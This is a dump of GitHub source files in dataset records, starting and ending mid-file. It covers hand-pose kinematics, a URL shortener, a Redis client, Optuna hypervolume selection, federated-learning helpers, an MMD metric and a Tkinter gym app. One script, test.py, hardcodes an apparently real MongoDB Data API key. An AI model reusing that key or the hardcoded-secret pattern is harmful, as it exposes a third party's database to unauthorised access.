self.finger_pose_param_indices = finger_pose_param_indices\n self.finger_vertex_indices = finger_vertex_indices\n self.finger_joint_indices = np.asarray(\n [0] + list(finger_joint_indices)).astype(dtype=int)\n self.tip_vertex_offsets = tip_vertex_offsets\n\n self.all_finger_vertex_indices = self._search_similar_vertices(\n finger_pose_param_indices, hand_state)\n\n self.finger_pose_params, self.finger_opt_vertex_indices = \\\n self.reduce_pose_parameters(hand_state)\n self.finger_error = FingerError(self.forward, action_weights)\n\n self.current_pose = np.zeros_like(\n self.finger_pose_param_indices).astype(dtype=float)\n\n self._optimizer_pose = np.zeros(len(self.current_pose) + 3)\n self.bounds = np.array([\n [-0.4 * np.pi, 0.4 * np.pi]] * len(self.current_pose))\n\n self.last_forward_result = None\n\n def _search_similar_vertices(self, finger_pose_param_indices, hand_state):\n # search for vertices that are influenced by the same pose parameters\n # TODO mapping to indices of weights might be correct by accident\n return np.unique(np.nonzero(\n hand_state.pose_parameters[\"weights\"][\n :, np.unique(finger_pose_param_indices // 3)])[0])\n\n def reset(self):\n \"\"\"Set all joint angles of the finger to 0.\"\"\"\n self.current_pose[:] = 0.0\n\n def reduce_pose_parameters(self, hand_state):\n \"\"\"Reduce parameters of the MANO model to this finger.\n\n Parameters\n ----------\n hand_state : HandState\n State of the hand mesh.\n\n Returns\n -------\n pose_params : dict\n Reduced set of pose parameters of MANO. 
Contains fields 'J',\n 'weights', 'kintree_table', 'v_template', 'posedirs'.\n\n finger_opt_vertex_indices : list\n Indices of vertices that will be used during numerical inverse\n kinematics of this finger.\n \"\"\"\n finger_opt_vertex_indices = []\n for idx in self.finger_vertex_indices:\n match = np.where(self.all_finger_vertex_indices == idx)[0]\n if not match:\n raise ValueError(\n f\"Vertex with index {idx} does not belong to this finger. \"\n f\"Possible options: {self.all_finger_vertex_indices}\")\n finger_opt_vertex_indices.append(match[0])\n pose_dir_joint_indices = np.hstack([np.arange(i, i + 9) for i in self.finger_joint_indices[1:]]).astype(int)\n\n v_template = hand_state.pose_parameters[\"v_template\"][self.finger_vertex_indices].copy()\n for i in range(len(v_template)):\n v_template[i] += self.tip_vertex_offsets[i]\n\n pose_params = {\n \"J\": hand_state.pose_parameters[\"J\"][self.finger_joint_indices],\n \"weights\": hand_state.pose_parameters[\"weights\"][self.finger_vertex_indices][:, self.finger_joint_indices],\n \"kintree_table\": hand_state.pose_parameters[\"kintree_table\"][:, self.finger_joint_indices], # TODO maybe this does not work in general\n \"v_template\": v_template,\n \"posedirs\": hand_state.pose_parameters[\"posedirs\"][self.finger_vertex_indices][:, :, pose_dir_joint_indices]\n }\n return pose_params, finger_opt_vertex_indices\n\n def has_cached_forward_kinematics(self):\n \"\"\"Check if this object has a cached forward kinematics result.\"\"\"\n return self.last_forward_result is not None\n\n def forward(self, pose=None, return_cached_result=False):\n \"\"\"Compute position at the tip of the finger for given joint parameters.\n\n Parameters\n ----------\n pose : array, shape (n_finger_joints * 3,), optional (default: None)\n Joint angles.\n\n return_cached_result : bool, optional (default: False)\n Return cached result of previous forward kinematics calculation.\n\n Returns\n -------\n pos : array, shape (n_markers_per_finger, 3)\n Vertex positions.\n \"\"\"\n if return_cached_result:\n assert self.last_forward_result is not None\n return self.last_forward_result\n\n self._optimizer_pose[3:] = pose\n self.last_forward_result = hand_vertices(\n pose=self._optimizer_pose, **self.finger_pose_params)\n return self.last_forward_result\n\n def inverse(self, position):\n \"\"\"Estimate finger joint parameters from position.\n\n Parameters\n ----------\n position : array, shape (n_markers_per_finger, 3)\n Desired position of vertices.\n\n Returns\n -------\n current_pose : array, shape (n_finger_joints * 3,)\n Joint angles.\n \"\"\"\n res = minimize(self.finger_error, self.current_pose, args=(position,),\n method=\"SLSQP\", bounds=self.bounds) # SLSQP, COBYLA\n self.current_pose[:] = res[\"x\"]\n return self.current_pose\n\n\nclass FingerError:\n \"\"\"Compute error function for finger.\n\n Parameters\n ----------\n forward_kinematics : callable\n Forward kinematics\n\n action_weights : array, shape (2, n_joints * 3)\n Weight of action penalty in error function for fingers.\n \"\"\"\n def __init__(self, forward_kinematics, action_weights):\n self.forward_kinematics = forward_kinematics\n self.action_weights = action_weights\n\n def __call__(self, finger_pose, desired_finger_pos):\n \"\"\"Compute error for numerical inverse kinematics.\n\n Parameters\n ----------\n finger_pose : array, shape (n_finger_joints * 3,)\n Joint angles.\n\n desired_finger_pos : array, shape (n_markers_per_finger, 3)\n Desired finger positions.\n \"\"\"\n positions = 
self.forward_kinematics(finger_pose)\n desired_finger_pos = np.atleast_2d(desired_finger_pos)\n\n # TODO seems fragile, what if we only have a middle marker and no tip?\n # in case there are no middle markers available:\n positions = positions[:len(desired_finger_pos)]\n\n pos_finger_pose = np.maximum(0.0, finger_pose)\n neg_finger_pose = -np.minimum(0.0, finger_pose)\n\n # squared cost improves result and speed drastically in comparison\n # to non-squared cost\n errors = np.linalg.norm(desired_finger_pos - positions, axis=1) ** 2\n error = np.nansum(errors)\n\n regularization = (\n np.dot(self.action_weights[0], pos_finger_pose) ** 2\n + np.dot(self.action_weights[1], neg_finger_pose) ** 2)\n\n return error + regularization\n","repo_name":"dfki-ric/hand_embodiment","sub_path":"hand_embodiment/record_markers.py","file_name":"record_markers.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"27529035932","text":"from .models import URLEntry\n\ndef UniqueID(url, user):\n #expects that url is a string and user is a User object\n cleaned_url = url.replace(\"http://\", \"\")\n cleaned_url = cleaned_url.replace(\"www\", \"\")\n cleaned_url = cleaned_url.replace(\"/\", \"\")\n cleaned_url = cleaned_url.replace(\".\", \"\")\n url_len = len(cleaned_url)\n num_digits = (url_len % 5) + 1\n interval = len(cleaned_url)/num_digits\n index = 0\n id = \"\"\n for x in range(0,num_digits):\n if index < len(cleaned_url):\n id += cleaned_url[index]\n index += interval\n\n\n is_duplicate = False\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n if previous_url_entry.exists():\n if previous_url_entry[0].user == user and previous_url_entry[0].original_url == url:\n is_duplicate = True\n else:\n id = ((url_len + 1)*len(id))%10000\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n while previous_url_entry.exists() and len(str(id))<6:\n if previous_url_entry[0].user == user and previous_url_entry[0].original_url == url:\n is_duplicate = True\n break\n else:\n id += 1\n previous_url_entry = URLEntry.objects.filter(url_id=id)\n\n if URLEntry.objects.filter(url_id=id).exists() and not is_duplicate:\n #if for some reason we end up here, which we probably won't, the empty string means we couldn't find a place for it\n id = \"\"\n\n return str(id), is_duplicate\n\ndef CreateShortenedURL(username, id):\n return str(\"remishakes.herokuapp.com/kg.\" + str(username) + \".\" + str(id) + \"/\")\n # url(r'^host_site/(?P\\w+\\d*).(?P\\w{1,10})$', views.URLRedirect, name='url_redirect'),\n\n\ndef IsUserLoggedIn(request, username):\n return request.user.username == username\n","repo_name":"KrisG014/SampleProjects","sub_path":"mysite/URLShortener/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15642154583","text":"from .parser import Reader\nfrom .errors import ConnectionClosedError\n\n\nclass Connection:\n def __init__(self, sock, encoding=\"utf-8\", max_recv=2**16):\n self._sock = sock\n self._encoding = encoding\n self._reader = Reader(encoding=encoding)\n self._max_recv = max_recv\n\n async def send_command(self, *args):\n lines = []\n lines.append(\"*%d\" % len(args))\n for arg in args:\n lines.append(\"$%d\" % len(arg))\n lines.append(arg)\n data = (\"\\r\\n\".join(lines) + \"\\r\\n\").encode(self._encoding)\n sent = await self._sock.sendall(data)\n return 
sent\n\n async def recv_response(self):\n while True:\n data = await self._sock.recv(self._max_recv)\n if not data:\n raise ConnectionClosedError(\"connection closed by peer\")\n self._reader.feed(data)\n res = self._reader.gets()\n if res is False: # don't want to ignore None\n continue\n return res\n","repo_name":"quiribot/curioredis","sub_path":"curioredis/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38338792862","text":"import requests,json\nfrom tabulate import tabulate\nurl = \"https://ap-southeast-1.aws.data.mongodb-api.com/app/data-zbetm/endpoint/data/v1/action/\"\napikey = \"hSl7T5DEqopdOtu6JYzUI4taQ6BwUmTSNRtBl2VXwIwpnMfjv13fsnpMxdgQltSX\"\nheaders = {\n 'Content-Type': 'application/json',\n 'Access-Control-Request-Headers': '*',\n 'api-key': apikey,\n} \ndef Search(message):\n option = ['-d','-n','-o']\n message = message.split(' ')\n op = [0]*3\n for msg in message:\n if msg in option:\n if(msg == '-d'):\n op[0] = message[message.index(msg) + 1]\n if(msg == '-n'):\n op[1] = message[message.index(msg) + 1]\n if(msg == '-o'):\n op[2] = message[message.index(msg) + 1]\n filter = {}\n if(op[0]):\n filter['upload_date'] = op[0]\n if(op[1]):\n filter['filename'] = op[1]\n if(op[2]):\n filter['owner'] = op[2]\n action = url + \"find\"\n payload = json.dumps({\n \"collection\": \"Documents\",\n \"database\": \"CompanyStorage\",\n \"dataSource\": \"Cluster0\",\n \"filter\" : filter,\n \"projection\":{\n \"filename\":1,\n \"owner\":1,\n \"upload_date\":1,\n \"sha256\":1\n }\n }) \n \n response = requests.request(\"POST\", action, headers=headers, data=payload)\n result = json.loads(response.text)['documents']\n to_print = len(result)*[0]\n for i in range(0,len(result)):\n to_print[i] = result[i]['_id'], result[i]['filename'],result[i]['owner'],result[i]['upload_date'],result[i]['sha256']\n print(tabulate(to_print,headers=['ID','File Name','Owner','Upload Date','SHA256'],tablefmt='grid'))\n\nmsg = '/search -o hello'\nSearch(msg)","repo_name":"toomhufm/SecloudityConsole","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69885566853","text":"import sys\nfrom typing import List\n\ninput = sys.stdin.readline\n\n\ndef solution(board: List[List[int]]) -> int:\n row, calumn = len(board), len(board[0])\n directions = [(1, 0), (0, -1), (-1, 0), (0, 1)]\n\n def dfs(r, c, board):\n stack = [(r, c)]\n board[r][c] = 0\n size = 1\n while stack:\n tr, tc = stack[-1]\n remove = True\n for dr, dc in directions:\n if 0 <= tr + dr < row and 0 <= tc + dc < calumn:\n if board[tr + dr][tc + dc]:\n board[tr + dr][tc + dc] = 0\n stack.append((tr + dr, tc + dc))\n remove = False\n size += 1\n break\n if remove:\n stack.pop()\n return size\n\n global_max = -1\n for r in range(row):\n for c in range(calumn):\n if board[r][c]:\n local_max = dfs(r, c, board)\n global_max = local_max if local_max > global_max else global_max\n\n return global_max\n\n\nN, M, K = map(int, input().split())\nboard = [[0] * M for _ in range(N)]\nfor _ in range(K):\n r, c = map(int, input().split())\n board[r - 1][c - 1] = 1\nprint(solution(board))","repo_name":"vincent-kk/Basic-Algorithm","sub_path":"12. 
DFS/1743.py","file_name":"1743.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"17224175858","text":"from typing import List\n\nimport numpy as np\n\nimport optuna\n\n\ndef _solve_hssp(\n rank_i_loss_vals: np.ndarray,\n rank_i_indices: np.ndarray,\n subset_size: int,\n reference_point: np.ndarray,\n) -> np.ndarray:\n \"\"\"Solve a hypervolume subset selection problem (HSSP) via a greedy algorithm.\n\n This method is a 1-1/e approximation algorithm to solve HSSP.\n\n For further information about algorithms to solve HSSP, please refer to the following\n paper:\n\n - `Greedy Hypervolume Subset Selection in Low Dimensions\n `_\n \"\"\"\n selected_vecs: List[np.ndarray] = []\n selected_indices: List[int] = []\n contributions = [\n optuna._hypervolume.WFG().compute(np.asarray([v]), reference_point)\n for v in rank_i_loss_vals\n ]\n hv_selected = 0.0\n while len(selected_indices) < subset_size:\n max_index = int(np.argmax(contributions))\n contributions[max_index] = -1 # mark as selected\n selected_index = rank_i_indices[max_index]\n selected_vec = rank_i_loss_vals[max_index]\n for j, v in enumerate(rank_i_loss_vals):\n if contributions[j] == -1:\n continue\n p = np.max([selected_vec, v], axis=0)\n contributions[j] -= (\n optuna._hypervolume.WFG().compute(np.asarray(selected_vecs + [p]), reference_point)\n - hv_selected\n )\n selected_vecs += [selected_vec]\n selected_indices += [selected_index]\n hv_selected = optuna._hypervolume.WFG().compute(np.asarray(selected_vecs), reference_point)\n\n return np.asarray(selected_indices, dtype=int)\n","repo_name":"optuna/optuna","sub_path":"optuna/_hypervolume/hssp.py","file_name":"hssp.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":8930,"dataset":"github-code","pt":"44"} +{"seq_id":"10176171421","text":"from itertools import product, tee\n\nGRID_SIZE = 300\n\n\ndef get_power_level(x, y, sn):\n # global grid_serial_number\n rack_id = x + 10\n power_level = rack_id * y\n power_level += sn\n power_level *= rack_id\n power_level = (power_level // 100) % 10\n power_level -= 5\n return power_level\n\n\ndef main():\n with open('11.in', 'r') as f:\n sn = int(f.read())\n\n grid = {}\n known_levels = set()\n\n for x, y in product(*tee(range(1, GRID_SIZE+1), 2)):\n level = get_power_level(x, y, sn)\n grid[(x, y)] = level\n known_levels.add(level)\n\n max_charge = min(known_levels) * 9\n strongest_cell = (None, None)\n strongest_size = None\n for s in range(2, GRID_SIZE+1):\n for x in range(1, GRID_SIZE+1-s, 1):\n for y in range(1, GRID_SIZE+1-s, 1):\n cell_charge = []\n for i, j in product(*tee(range(s), 2)):\n cell_charge.append(grid[(x+i, y+j)])\n if sum(cell_charge) > max_charge:\n max_charge = sum(cell_charge)\n strongest_cell = (x, y)\n strongest_size = s\n\n if s == 3:\n print(f\"part 1: {strongest_cell}\")\n\n print(f\"part 2: {strongest_cell},{strongest_size}\")\n\nif __name__ == '__main__':\n main()\n\n\n\n\n","repo_name":"semion/advent_2018","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19150197113","text":"from django.contrib import messages\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom .api import api\nfrom oauthlib.common import generate_token\nfrom 
oauth2_provider.models import AccessToken, Application\nfrom django.utils import timezone\nfrom dateutil.relativedelta import relativedelta\nfrom oauth2_provider.models import RefreshToken\nfrom django.conf import settings\n\n\n@login_required\ndef me(request):\n return redirect(\n reverse(\"journal:user_profile\", args=[request.user.mastodon_username])\n )\n\n\ndef home(request):\n if request.user.is_authenticated:\n home = request.user.get_preference().classic_homepage\n if home == 1:\n return redirect(\n reverse(\"journal:user_profile\", args=[request.user.mastodon_username])\n )\n elif home == 2:\n return redirect(reverse(\"social:feed\"))\n else:\n return redirect(reverse(\"catalog:discover\"))\n else:\n return redirect(reverse(\"catalog:discover\"))\n\n\ndef error_400(request, exception=None):\n return render(\n request,\n \"400.html\",\n {\"exception\": exception},\n status=400,\n )\n\n\ndef error_403(request, exception=None):\n return render(request, \"403.html\", status=403)\n\n\ndef error_404(request, exception=None):\n return render(request, \"404.html\", status=404)\n\n\ndef error_500(request, exception=None):\n return render(request, \"500.html\", status=500)\n\n\n@login_required\ndef developer(request):\n token = None\n if request.method == \"POST\":\n user = request.user\n app = Application.objects.filter(\n client_id=settings.DEVELOPER_CONSOLE_APPLICATION_CLIENT_ID\n ).first()\n if app:\n for token in AccessToken.objects.filter(user=user, application=app):\n token.revoke()\n token = generate_token()\n AccessToken.objects.create(\n user=user,\n application=app,\n scope=\"read write\",\n expires=timezone.now() + relativedelta(days=365),\n token=token,\n )\n else:\n token = \"Configuration error, contact admin\"\n context = {\n \"api\": api,\n \"token\": token,\n \"openapi_json_url\": reverse(f\"{api.urls_namespace}:openapi-json\"),\n }\n return render(request, \"developer.html\", context)\n","repo_name":"Haruha-Raharu/neodb","sub_path":"common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"37855434829","text":"import numpy as np\nimport pickle as pkl\nfrom sklearn.random_projection import johnson_lindenstrauss_min_dim as jl_dim\nimport torch\n\nfrom common.nb_utils import pca_transform\nfrom common.utils import decor_print, get_device, get_random_vector\nfrom data.loader import get_dataloader\nfrom models.utils import forward, get_loss_fn, get_model, get_optim\nfrom models.model_op import get_layer_size, get_model_grads\n\n\ndef stack_layers(sdirs):\n stacked = []\n for layer_num in range(len(sdirs[0])):\n stacked.append(\n np.hstack(\n [_[layer_num].reshape(-1, 1).cpu().numpy() for _ in sdirs]\n )\n )\n\n return stacked\n\n\ndef get_dga_sdirs(args, data, labels):\n device = get_device(args)\n sdirs = []\n for x, y in zip(data, labels):\n # dga_bs: dist grad accum. 
batch size\n dataloader = get_dataloader(x, y, args.dga_bs, shuffle=False)\n count = 0\n for xiter, yiter in dataloader:\n model, loss_type = get_model(args, False)\n loss_fn = get_loss_fn(loss_type)\n opt = get_optim(args, model)\n\n loss, _ = forward(\n model, xiter, yiter, opt, loss_fn, device)\n loss.backward()\n sdirs.append(get_model_grads(model, flatten=True))\n count += 1\n if count >= args.num_dga:\n break\n\n stacked = [[] for _ in range(len(sdirs[0]))]\n\n for l in range(len(sdirs[0])):\n for i in range(len(sdirs)):\n stacked[l].append(sdirs[i][l].flatten())\n\n sdirs = [[] for _ in range(args.ncomponent)]\n for l, layer in enumerate(stacked):\n layer = torch.stack(layer, dim=0).T.cpu().numpy()\n layer, _ = pca_transform(layer, args.ncomponent)\n for i in range(args.ncomponent):\n sdirs[i].append(layer[:, i].flatten())\n\n assert len(sdirs) == args.ncomponent\n\n return sdirs\n\n\ndef get_jl_dim(samples, eps):\n return max([jl_dim(s, eps)[0] for s in samples])\n\n\ndef load_sdirs(path):\n sdirs = pkl.load(open(path, 'rb'))\n sdirs = [[torch.Tensor(l) for l in sdir] for sdir in sdirs]\n decor_print('ncomponents: {}'.format(len(sdirs)))\n\n return sdirs\n\n\ndef get_rp_dirs(args, model):\n if not args.ncomponent:\n num_sdirs = get_jl_dim(layer_sizes, args.rp_eps)\n else:\n num_sdirs = args.ncomponent\n layer_sizes = get_layer_size(model)\n decor_print('Number of directions for eps {}: {}'.format(\n args.rp_eps, num_sdirs))\n\n return [\n [\n get_random_vector(1.0, np.sqrt(num_sdirs), s)\n for s in layer_sizes\n ] for _ in range(num_sdirs)\n ]\n\n\ndef get_rp_block(args, model):\n if not args.ncomponent:\n num_sdirs = get_jl_dim(layer_sizes, args.rp_eps)\n else:\n num_sdirs = args.ncomponent\n layer_sizes = get_layer_size(model)\n decor_print('Number of directions for eps {}: {}'.format(\n args.rp_eps, num_sdirs))\n\n return [\n get_random_vector(1.0, np.sqrt(num_sdirs), (num_sdirs, s[0]))\n for s in layer_sizes\n ]\n\n\ndef get_sdirs(args, model, paths, X, y):\n sdirs = []\n if args.paradigm:\n if 'rp' in args.paradigm:\n sdirs = get_rp_dirs(args, model)\n elif 'pca' in args.paradigm:\n print('Loading: {}'.format(paths.pca_path))\n sdirs = load_sdirs(paths.pca_path)\n elif 'dga' in args.paradigm:\n print('Loading: {}'.format(paths.dga_path))\n sdirs = load_sdirs(paths.dga_path)\n\n return sdirs\n","repo_name":"shams-sam/FedOptim","sub_path":"src/common/approximation.py","file_name":"approximation.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"12049428329","text":"from typing import TYPE_CHECKING, Dict, Sequence\n\nimport numpy as np\n\nif TYPE_CHECKING:\n from zquantum.core.distribution import MeasurementOutcomeDistribution\n\n\ndef compute_rbf_kernel(x_i: np.ndarray, y_j: np.ndarray, sigma: float) -> np.ndarray:\n \"\"\"Compute the gaussian (RBF) kernel matrix K, with K_ij = exp(-gamma |x_i - y_j|^2)\n and gamma = 1/(2*sigma).\n\n Args:\n x_i: Samples A (integers).\n y_j: Samples B (integers).\n sigma: The bandwidth of the gaussian kernel.\n\n Returns:\n np.ndarray: The gaussian kernel matrix.\n \"\"\"\n exponent = np.abs(x_i[:, None] - y_j[None, :]) ** 2\n try:\n gamma = 1.0 / (2 * sigma)\n except ZeroDivisionError as error:\n print(\"Handling run-time error:\", error)\n raise\n kernel_matrix = np.exp(-gamma * exponent)\n return kernel_matrix\n\n\ndef compute_multi_rbf_kernel(\n x_i: np.ndarray, y_j: np.ndarray, sigmas: Sequence[float]\n) -> np.ndarray:\n \"\"\"Compute 
the multi-gaussian (RBF) kernel matrix K, with\n\n K_ij = 1/N * Sum_n [exp(-gamma_n |x_i - y_j|^2)]\n\n with n = 1,...,N and gamma = 1/(2*sigma).\n\n Args:\n x_i: Samples A (integers).\n y_j: Samples B (integers).\n sigmas: The list of bandwidths of the multi-gaussian kernel.\n\n Returns:\n np.ndarray: The gaussian kernel matrix.\n \"\"\"\n exponent = np.abs(x_i[:, None] - y_j[None, :]) ** 2\n kernel_matrix = np.zeros(exponent.shape)\n for sigma in sigmas:\n try:\n gamma = 1.0 / (2 * sigma)\n except ZeroDivisionError as error:\n print(\"Handling run-time error:\", error)\n raise\n kernel_matrix += np.exp(-gamma * exponent)\n return kernel_matrix / len(sigmas)\n\n\ndef compute_mmd(\n target_distribution: \"MeasurementOutcomeDistribution\",\n measured_distribution: \"MeasurementOutcomeDistribution\",\n distance_measure_parameters: Dict,\n) -> float:\n \"\"\"Compute the squared Maximum Mean Discrepancy (MMD) distance measure between\n between a target distribution and a measured distribution.\n Reference: arXiv.1804.04168.\n\n Args:\n target_distribution: The target probability distribution.\n measured_distribution: The measured probability distribution.\n\n distance_measure_parameters:\n sigma (float/np.array): the bandwidth parameter used to compute the\n single/multi gaussian kernel. The default value is 1.0.\n\n Returns:\n The value of the maximum mean discrepancy.\n \"\"\"\n\n sigma = distance_measure_parameters.get(\"sigma\", 1.0)\n target_keys = target_distribution.distribution_dict.keys()\n measured_keys = measured_distribution.distribution_dict.keys()\n all_keys = set(target_keys).union(measured_keys)\n\n target_values = []\n measured_values = []\n for bitstring in all_keys:\n # Add 0 to the values list whenever a bistrings isn't found among the keys.\n target_values.append(target_distribution.distribution_dict.get(bitstring, 0))\n measured_values.append(\n measured_distribution.distribution_dict.get(bitstring, 0)\n )\n\n basis = np.asarray(\n [int(\"\".join(map(str, item)), 2) for item in all_keys]\n ) # Digit Tuple to int\n if not hasattr(sigma, \"__len__\"):\n kernel_matrix = compute_rbf_kernel(basis, basis, sigma)\n else:\n kernel_matrix = compute_multi_rbf_kernel(basis, basis, sigma)\n\n diff = np.array(target_values) - np.array(measured_values)\n return diff.dot(kernel_matrix.dot(diff))\n","repo_name":"zapatacomputing/z-quantum-core","sub_path":"src/python/zquantum/core/distribution/mmd.py","file_name":"mmd.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"72363761413","text":"''' Programação do Protótipo - POWER UP do Instrutor'''\r\n\r\n# Impotando as blibliotecas \r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nimport sqlite3\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nfrom random import choice, randint \r\n\r\n# Tela para edição da Ficha dos Alunos\r\nclass Tela_Fichas(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n pessoas = []\r\n alunos = ['Gabriel', 'Rafaela', 'Alexandre', 'Milena', 'Kauã', 'Júlia', 'Ana']\r\n\r\n def __init__(self, original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Fichas dos Alunos') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n self.lista_frame2()\r\n 
self.get_aluno()\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal FICHA DOS ALUNOS\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg = self.cor_cinza) # Frame para o título principal FICHA DOS ALUNOS\r\n self.frame2.place(relx = 0.03, rely = 0.15, relwidth = 0.94, relheight = 0.1)\r\n\r\n self.titulo = Label(self.frame1, # Titulo 'FICHA DOS ALUNOS'\r\n text='FICHA DOS ALUNOS',\r\n font=('Britannic Bold', 30),\r\n bg=self.cor_laranja,\r\n fg='black')\r\n self.titulo.place(relx = 0.1, rely = 0.15)\r\n\r\n self.pesquisa_entry = Entry(self.frame2, # Entrada de pesquisa\r\n bg='white',\r\n fg='black',\r\n font=('Britannic Bold', 16))\r\n self.pesquisa_entry.place(relx = 0.24, rely = 0.21, relwidth = 0.75, relheight = 0.56)\r\n\r\n self.btn_novo_aluno = Button(self, # Botão de Atualizar Informações\r\n bg = self.cor_laranja,\r\n fg='white',\r\n text='Novo Aluno',\r\n font=('Britannic Bold', 20))\r\n self.btn_novo_aluno.place(relx = 0.25, rely = 0.8, relwidth = 0.17, relheight = 0.08)\r\n\r\n self.img = PhotoImage(file='btn_pesquisa_aluno.png') # Botão de voltar para a página anterior \r\n self.btn_pesquisa = Button(self, image=self.img, command=self.busca_aluno)\r\n self.btn_pesquisa.place(relx=0.05, rely=0.16)\r\n\r\n self.img1 = PhotoImage(file='btn_voltar.PNG') # Botão de voltar para a página anterior \r\n self.btn_voltar = Button(self, image=self.img1, command= self.clica_voltar)\r\n self.btn_voltar.place(relx=0.1, rely=0.8)\r\n\r\n def lista_frame2(self):\r\n self.listaCli = ttk.Treeview(self, height = 0, column = (\"col1\", \"col2\"))\r\n self.listaCli.place(relx = 0.03, rely = 0.26, relwidth = 0.94, relheight = 0.53)\r\n self.listaCli.heading(\"#0\", text = '')\r\n self.listaCli.heading(\"#1\", text = \"Identificação\")\r\n self.listaCli.heading(\"#2\", text = \"Nome\")\r\n\r\n self.listaCli.column('#0', width=0)\r\n self.listaCli.column('#1', stretch=YES, minwidth=25, width=100, anchor=\"center\")\r\n self.listaCli.column('#2', stretch=YES, minwidth=25, width=100, anchor=\"center\")\r\n\r\n # Configurações para a Barra de Rolagem do Treeview\r\n self.barra_de_rolagem = Scrollbar(self.listaCli, orient = \"vertical\")\r\n self.listaCli.configure(yscroll = self.barra_de_rolagem.set)\r\n self.barra_de_rolagem.place(relx=0.98, rely = 0.032, relheight = 0.96)\r\n\r\n # Realiza um onDoubleClick para abrir a ficha do aluno \r\n self.listaCli.bind(\"\", self.onDoubleClick)\r\n\r\n def get_aluno(self):\r\n # Lista de alunos \r\n for n in self.alunos:\r\n self.listaCli.insert(\"\", END, values=n)\r\n\r\n def busca_aluno(self):\r\n self.pesquisa = self.pesquisa_entry.get()\r\n for n in self.alunos:\r\n if self.pesquisa == n:\r\n self.listaCli.delete(*self.listaCli.get_children())\r\n self.listaCli.insert('', END, values=n)\r\n\r\n def onDoubleClick(self, event):\r\n self.listaCli.selection()\r\n print('Aluno Selecionado')\r\n\r\n def clica_voltar(self): # Comando do botão\r\n self.hide()\r\n self.subframe = Tela_Inicial(self) # Próxima janela para ser aberta\r\n\r\n def hide(self):\r\n self.withdraw()\r\n def show(self):\r\n self.update()\r\n self.deiconify()\r\n\r\n# Tela para obter uma planilha com o Fluxo de Alunos\r\nclass Tela_Fluxo(Toplevel):\r\n # Atributos do app\r\n cor_laranja = '#f48c06'\r\n cor_cinza = '#ced4da'\r\n hora = 0\r\n pessoas = []\r\n alunos = ['Gabriel', 'Rafaela', 'Alexandre', 'Milena', 'Kauã', 'Júlia', 'Ana Moura']\r\n\r\n def __init__(self, 
original):\r\n self.original_frame = original\r\n Toplevel.__init__(self) # Importando o Metódo Construtor\r\n self.title('Fluxo de Alunos') \r\n self.geometry('1340x680+290+200')\r\n self.configure(bg = 'white')\r\n # Ícone\r\n self.iconbitmap('powerup_icone.ico')\r\n\r\n self.widgets()\r\n self.lista_frame2()\r\n self.get_log()\r\n self.conta_presentes()\r\n\r\n def lista_frame2(self):\r\n self.listaCli = ttk.Treeview(self.frame2, height = 0, column = (\"col1\", \"col2\", \"col3\"))\r\n self.listaCli.place(relx = 0.01, rely = 0.05, relwidth = 0.56, relheight = 0.75)\r\n self.listaCli.heading(\"#0\", text = \"\")\r\n self.listaCli.heading(\"#1\", text = \"Identificação\")\r\n self.listaCli.heading(\"#2\", text = \"Entrada\")\r\n self.listaCli.heading(\"#3\", text = \"Saída\")\r\n\r\n self.listaCli.column('#0', stretch=YES, width=0, anchor=\"center\")\r\n self.listaCli.column('#1', stretch=YES, minwidth=10, width=25, anchor=\"center\")\r\n self.listaCli.column('#2', stretch=YES, minwidth=25, width=40, anchor=\"center\")\r\n self.listaCli.column('#3', stretch=YES, minwidth=40, width=55, anchor=\"center\")\r\n\r\n # Configurações para a Barra de Rolagem do Treeview\r\n self.barra_de_rolagem = Scrollbar(self.listaCli, orient = \"vertical\")\r\n self.listaCli.configure(yscroll = self.barra_de_rolagem.set)\r\n self.barra_de_rolagem.place(relx=0.98, rely = 0.032, relheight = 0.96)\r\n\r\n def widgets(self):\r\n self.frame1 = Frame(self, bg = self.cor_laranja) # Frame para o título principal FLUXO DE ALUNOS\r\n self.frame1.place(relx = 0, rely = 0, relwidth = 1, relheight = 0.13)\r\n\r\n self.frame2 = Frame(self, bg = self.cor_cinza) # Frame para o quadro treeview\r\n self.frame2.place(relx = 0.45, rely = 0.22, relwidth = 0.95, relheight = 0.95)\r\n\r\n self.frame3 = Frame(self, bg = self.cor_cinza) # Frame para o título para a DATA 